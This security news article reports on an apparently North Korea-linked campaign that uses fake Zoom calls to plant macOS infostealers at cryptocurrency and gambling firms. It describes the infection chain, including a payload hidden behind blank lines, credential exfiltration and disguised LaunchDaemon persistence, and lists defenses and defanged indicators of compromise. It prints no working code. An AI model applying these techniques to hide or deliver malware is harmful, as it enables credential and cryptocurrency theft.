The Field Effect Analysis team has uncovered a highly sophisticated cyberattack campaign tied to the North Korea-aligned BlueNoroff advanced persistent threat (APT) group, where actors weaponize the Zoom videoconferencing platform as a vector for delivering infostealer malware.
The campaign, targeting industries linked to cryptocurrency and online gambling, underscores the evolving technical prowess of financially motivated threat actors operating under the broader Lazarus Group umbrella.
Technical Attack Overview
Technical analysis reveals that the operation begins with elaborate social engineering using both trusted contact impersonation achieved through credential compromise and accurate Zoom brand emulation.
Victims receive invites to Zoom meetings with seemingly legitimate contacts, only to be exposed to malicious prompts during the call.
For example, during a May 28, 2025 attack on a Canadian online gambling provider, the threat actor induced the victim to execute an AppleScript task masquerading as an “audio repair tool.”
Although the script appeared benign, it concealed a payload within thousands of blank lines, ultimately downloading and executing secondary malware from the rogue domain zoom-tech[.]us.
The infection chain is multi-stage:
- An initial OSA (Open Scripting Architecture) script downloads a secondary shell script, using unique target identifiers for precision targeting and tracking.
- Victims are manipulated into entering their local system credentials, which are immediately exfiltrated to external attacker infrastructure.
- Subsequent payloads fetch and execute further implants including an infostealer binary enabling deep system compromise.
- Persistence is maintained via LaunchDaemon bootstrap configurations, set with administrator privileges, and camouflaged under legitimate-sounding names (e.g.,
com.apple.security.update).
The malware employs extensive anti-forensics, such as rapid data exfiltration even before the full payload is installed and prompt deletion of temporary artifacts.
Key data targeted includes macOS Keychain files, browser credentials (notably from Chrome and Brave, favored by cryptocurrency users), cookies, and history.
Moreover, reconnaissance scripts gather detailed endpoint and network context, furthering post-exploitation objectives.
Infrastructure and Attribution
According to the Report, The Command-and-Control (C2) infrastructure shows a pattern of Zoom-impersonating domains and rapid-fire domain registrations, often linked via WHOIS records to a common operator.
Analysis ties these domains to BlueNoroff/APT38, notorious for high-value cryptocurrency and financial sector targeting.
Infrastructure overlaps, such as use of Ukrainian security tool GitHub repositories to mask traffic and numerous lookalike domains, indicate a high degree of operational sophistication.
Defending against this campaign requires layered controls:
- Restrict execution of unauthorized scripts and binaries, leveraging macOS Gatekeeper and System Integrity Protection (SIP).
- Deploy Managed Detection and Response (MDR) and EDR platforms to spotlight suspicious scripting behavior, unauthorized credential access, creation of persistence mechanisms, and abnormal network egress (e.g., suspicious
curlorrsyncactivity). - Enforce organization-wide policies prohibiting spontaneous technical support prompts and encourage verification of all IT assistance requests.
- Conduct ongoing user training and red-teaming exercises to reinforce vigilance against video-call-based social engineering.
The campaign is a prime example of state-sponsored actors embedding themselves seamlessly within the workflows of legitimate business tools to maximize trust exploitation and dwell time, with the explicit intent of financial data theft and subsequent monetization through cryptocurrency assets.
Indicators of Compromise (IoCs)
| Type | Value / Hash / Path | Description |
|---|---|---|
| File | /Library/RestoreKey/com.apple.siri.updater | Malware implant |
| File Hash | MD5: 032E3E9A09F58A5B776C7374FC66D822 | |
| File Hash | SHA256: 036CA0A9D6A87E811F96F3AAADD8D0506954716CDB3B56915FC20859F1363C2F | |
| File | /Users/Shared/com.apple.sysd | Infostealer stage |
| File Hash | MD5: 1653D75D579872FADEC1F22CF7FEE3C0 | |
| File Hash | SHA256: 81612CAB25C707A4C5D12BB21FF5F87386FB52DCD0A12BBD063A9B4B11F2DF14 | |
| File | /Users/Shared/.u8xLja | Arbitrary loader component |
| File | /tmp/icloud_helper | Credential harvester |
| File Hash | SHA256: 5B6CE5E4AB8805884E497B53E57E05BE8B2AB07C87DADCBDCE137AC7DF025690 | |
| Domain | zoom-tech[.]us | Malicious download and C2 |
| Domain | ajayplamingo[.]com | C2 infrastructure |
| Domain | zmwebsdk[.]com | Data exfiltration endpoint |
| IP | 23.254.203[.]244 | C2 server |
| File | /Library/LaunchDaemons/com.apple.security.update.plist | Persistence mechanism |
| File | /Users//Library/Application Support/CloudStore | Staging location for exfiltration |
| File | /Users/Shared/.pwd | Stolen credentials |
| Additional Domains | Numerous Zoom lookalike domains (see report for full listing) | Used across campaign for staging and impersonation |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
